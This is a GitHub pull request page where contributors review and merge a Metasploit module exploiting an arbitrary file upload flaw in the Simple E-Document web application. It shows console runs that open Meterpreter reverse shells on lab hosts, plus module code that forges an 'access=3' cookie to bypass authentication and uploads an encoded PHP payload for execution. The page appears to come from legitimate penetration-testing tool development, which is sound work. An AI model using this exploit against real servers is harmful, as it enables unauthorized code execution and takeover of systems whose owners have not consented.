Add Simple E-Document Arbitrary File Upload module #2913

Merged
merged 1 commit into from Jan 27, 2014

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Jan 24, 2014

Add Simple E-Document Arbitrary File Upload module.

Just another example of arbitrary file upload+exec with grepping for the upload directory.

Homepage: http://sourceforge.net/projects/simplee-doc/
Tested on: Tested on Simple E-Document versions 3.0 and 3.1 (Kali Linux)

exploit

Output

msf > use exploit/unix/webapp/simple_e_document_upload_exec 
msf exploit(simple_e_document_upload_exec) > set RHOST 192.168.237.136
RHOST => 192.168.237.136
msf exploit(simple_e_document_upload_exec) > check
[*] The target appears to be vulnerable.
msf exploit(simple_e_document_upload_exec) > run

[*] Started reverse handler on 192.168.237.134:4444 
[*] 192.168.237.136:80 - Uploading malicious file...
[+] 192.168.237.136:80 - Payload uploaded successfully.
[+] 192.168.237.136:80 - Found upload path /simple_e_document_v_1_31/in/
[*] 192.168.237.136:80 - Executing nvjATUN.php...
[*] Sending stage (39848 bytes) to 192.168.237.136
[*] Meterpreter session 1 opened (192.168.237.134:4444 -> 192.168.237.136:52521) at 2014-01-24 04:35:40 -0500
[+] Deleted nvjATUN.php
getuid

meterpreter > getuid
Server username: www-data (33)
@jvazquez-r7
Contributor

Processing!

@jvazquez-r7
Contributor

After installing simple_e_document, directories for uploads need to be configured correctly in order to work:

msf > use exploit/unix/webapp/simple_e_document_upload_exec 
msf exploit(simple_e_document_upload_exec) > show options

Module options (exploit/unix/webapp/simple_e_document_upload_exec):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   Proxies                                no        Use a proxy chain
   RHOST                                  yes       The target address
   RPORT      80                          yes       The target port
   TARGETURI  /simple_e_document_v_1_31/  yes       The base path to Simple E-Document
   VHOST                                  no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Generic (PHP Payload)


msf exploit(simple_e_document_upload_exec) > set RHOST 192.168.172.135
RHOST => 192.168.172.135
msf exploit(simple_e_document_upload_exec) > set TARGETURI /simple_e_document/
TARGETURI => /simple_e_document/
msf exploit(simple_e_document_upload_exec) > check
[*] The target appears to be vulnerable.
msf exploit(simple_e_document_upload_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.135:80 - Uploading malicious file...
[+] 192.168.172.135:80 - Payload uploaded successfully.
[+] 192.168.172.135:80 - Found upload path /simple_e_document/in
[*] 192.168.172.135:80 - Executing CvFUZ9Wl.php...
[*] Sending stage (39848 bytes) to 192.168.172.135
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.135:60319) at 2014-01-27 07:49:49 -0600
[+] Deleted CvFUZ9Wl.php

ls
^C[-] Exploit failed: Interrupt 

meterpreter > ls

Listing: /var/www/simple_e_document/in
======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  0     fil   2014-01-27 07:36:12 -0600  index.php

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.135 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(simple_e_document_upload_exec) > 
@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
+ ], self.class)
+ end
+
+ #
+ # Checks if target allows file uploads
+ #
+ def check
+ res = send_request_raw({
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'cookie' => 'access=3'
+ })
+ if not res
+ print_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.body =~ /File Uploading Has Been Disabled/
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

elsif res.body and res.body.to_s =~ /File Uploading Has Been Disabled/

@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ end
+
+ #
+ # Checks if target allows file uploads
+ #
+ def check
+ res = send_request_raw({
+ 'uri' => normalize_uri(target_uri.path, 'upload.php'),
+ 'cookie' => 'access=3'
+ })
+ if not res
+ print_error("#{peer} - Connection timed out")
+ return Exploit::CheckCode::Unknown
+ elsif res.body =~ /File Uploading Has Been Disabled/
+ print_error("#{peer} - File uploads are disabled")
+ elsif res.body =~ /Upload File/
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

elsif res.body and res.body.to_s =~ /Upload File/

@jvazquez-r7 jvazquez-r7 commented on the diff Jan 27, 2014
...exploits/unix/webapp/simple_e_document_upload_exec.rb
+ end
+
+ #
+ # Uploads our malicious file
+ #
+ def upload
+ @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
+ php = "<?php #{payload.encoded} ?>"
+ data = Rex::MIME::Message.new
+ data.add_part('upload', nil, nil, 'form-data; name="op1"')
+ data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
+ post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
+ print_status("#{peer} - Uploading malicious file...")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, 'upload.php?op=newin'),
@jvazquez-r7
jvazquez-r7 Jan 27, 2014 Contributor

use get_vars for op=newin

@jvazquez-r7
Contributor

Easy fixes, fixing by myself and landing, thanks @bcoles !

@jvazquez-r7 jvazquez-r7 added a commit that referenced this pull request Jan 27, 2014
@jvazquez-r7 jvazquez-r7 Land #2913, @bcoles Exploit for Simple E-Document f086655
@jvazquez-r7 jvazquez-r7 merged commit 32d6032 into rapid7:master Jan 27, 2014

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Landed after last clean up here: 861126f

thanks @bcoles !

@bcoles bcoles deleted the bcoles:simple_e_document_upload_exec branch Jan 28, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment